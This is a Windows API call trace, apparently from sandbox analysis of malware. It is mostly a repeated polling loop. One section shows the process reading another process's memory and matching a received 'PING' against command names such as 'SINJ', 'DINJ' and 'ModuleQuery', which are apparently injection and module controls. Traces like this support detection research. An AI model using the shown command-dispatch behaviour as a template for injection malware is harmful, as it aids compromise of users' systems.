	[0233.088] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.088] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.088] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.088] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27786b8) returned 1
	[0233.088] Sleep (dwMilliseconds=0xbb8) 
	[0233.096] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.096] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.096] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.096] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.096] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.097] Sleep (dwMilliseconds=0xbb8) 
	[0233.112] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.112] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.112] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.112] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.112] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.112] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.112] Sleep (dwMilliseconds=0xbb8) 
	[0233.128] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.128] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.128] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.129] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.129] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.129] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.129] Sleep (dwMilliseconds=0xbb8) 
	[0233.143] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.143] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.144] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.144] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.144] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.144] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.144] Sleep (dwMilliseconds=0xbb8) 
	[0233.159] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.159] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.159] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.159] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.160] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.160] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.160] Sleep (dwMilliseconds=0xbb8) 
	[0233.174] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.174] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.175] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.175] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.175] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.175] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.175] Sleep (dwMilliseconds=0xbb8) 
	[0233.194] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.194] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.194] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.194] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.194] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.194] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.194] Sleep (dwMilliseconds=0xbb8) 
	[0233.205] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.206] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.206] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.206] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.206] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.206] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.206] Sleep (dwMilliseconds=0xbb8) 
	[0233.221] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.221] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.221] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.221] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.221] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.222] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.222] Sleep (dwMilliseconds=0xbb8) 
	[0233.237] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.237] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.237] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.237] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.237] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.237] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0233.237] Sleep (dwMilliseconds=0xbb8) 
	[0233.253] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.253] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.253] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.253] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.253] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.253] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.253] Sleep (dwMilliseconds=0xbb8) 
	[0233.268] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.268] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.268] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.268] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.268] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.268] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.268] Sleep (dwMilliseconds=0xbb8) 
	[0233.283] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.283] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.283] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.283] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.283] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.283] Sleep (dwMilliseconds=0xbb8) 
	[0233.299] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.299] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.299] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.299] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.299] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.299] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.299] Sleep (dwMilliseconds=0xbb8) 
	[0233.314] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.314] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.314] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.314] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.315] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.315] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.315] Sleep (dwMilliseconds=0xbb8) 
	[0233.365] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.365] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.365] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.365] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.365] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.366] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.366] Sleep (dwMilliseconds=0xbb8) 
	[0233.377] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.377] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.377] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.377] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.377] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.377] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.377] Sleep (dwMilliseconds=0xbb8) 
	[0233.392] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.392] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.392] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.392] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.392] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.393] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.393] Sleep (dwMilliseconds=0xbb8) 
	[0233.408] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.408] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.408] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.408] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.408] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.408] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.409] Sleep (dwMilliseconds=0xbb8) 
	[0233.424] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.424] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.424] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.424] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.424] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.424] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.424] Sleep (dwMilliseconds=0xbb8) 
	[0233.440] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.440] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.440] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.440] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.440] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.440] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.440] Sleep (dwMilliseconds=0xbb8) 
	[0233.455] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.455] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.455] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.455] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.455] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.455] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.455] Sleep (dwMilliseconds=0xbb8) 
	[0233.471] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.471] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.471] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.471] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.471] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.471] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.471] Sleep (dwMilliseconds=0xbb8) 
	[0233.486] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.486] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.486] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.486] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.487] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.487] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.487] Sleep (dwMilliseconds=0xbb8) 
	[0233.501] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.502] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.502] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.502] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.502] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.502] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.502] Sleep (dwMilliseconds=0xbb8) 
	[0233.517] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.517] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.517] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.517] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.517] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.517] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.517] Sleep (dwMilliseconds=0xbb8) 
	[0233.533] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.533] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.533] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.533] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.533] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.533] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.533] Sleep (dwMilliseconds=0xbb8) 
	[0233.548] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.549] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.549] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.549] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.549] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.549] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.549] Sleep (dwMilliseconds=0xbb8) 
	[0233.574] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.574] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.574] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.574] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.574] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.574] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1
	[0233.574] Sleep (dwMilliseconds=0xbb8) 
	[0233.580] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0233.580] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0233.580] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22eb8b0
	[0233.580] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b88
	[0233.580] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0233.581] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0233.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0233.581] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7770
	[0233.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x22b7770, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0233.581] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x22eb8b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22eb8b0, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0233.581] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225b88, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b88*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0233.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0233.581] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778b18
	[0233.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x2778b18, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0233.581] SetEvent (hEvent=0x474) returned 1
	[0233.581] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0233.581] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22eb8b0) returned 1
	[0233.581] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b88) returned 1
	[0233.581] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778960
	[0233.581] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0233.581] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0233.581] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0233.581] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0233.581] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0233.581] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7740
	[0233.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27789b0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdc0) returned 0x608
	[0233.582] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27789d8
	[0233.582] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.582] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.582] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.582] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.582] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0233.582] Sleep (dwMilliseconds=0xbb8) 
	[0233.595] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.595] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.595] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.595] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.595] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.595] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0233.595] Sleep (dwMilliseconds=0xbb8) 
	[0233.611] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.611] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.611] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.611] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.611] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.611] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0233.611] Sleep (dwMilliseconds=0xbb8) 
	[0233.626] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.626] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.626] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.626] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.626] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.627] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0233.627] Sleep (dwMilliseconds=0xbb8) 
	[0233.645] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.645] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.645] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.645] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.645] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.645] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.645] Sleep (dwMilliseconds=0xbb8) 
	[0233.658] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.658] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.658] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.658] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.658] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.658] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.658] Sleep (dwMilliseconds=0xbb8) 
	[0233.673] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.673] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.674] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.674] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.674] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.674] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.674] Sleep (dwMilliseconds=0xbb8) 
	[0233.692] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.692] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.692] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.692] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.692] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.692] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.692] Sleep (dwMilliseconds=0xbb8) 
	[0233.705] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.705] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.705] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.705] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.706] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.706] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.706] Sleep (dwMilliseconds=0xbb8) 
	[0233.720] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.720] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.721] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.721] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.721] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0233.721] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0233.721] Sleep (dwMilliseconds=0xbb8) 
	[0233.736] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0233.736] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0233.736] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0233.736] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0233.736] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
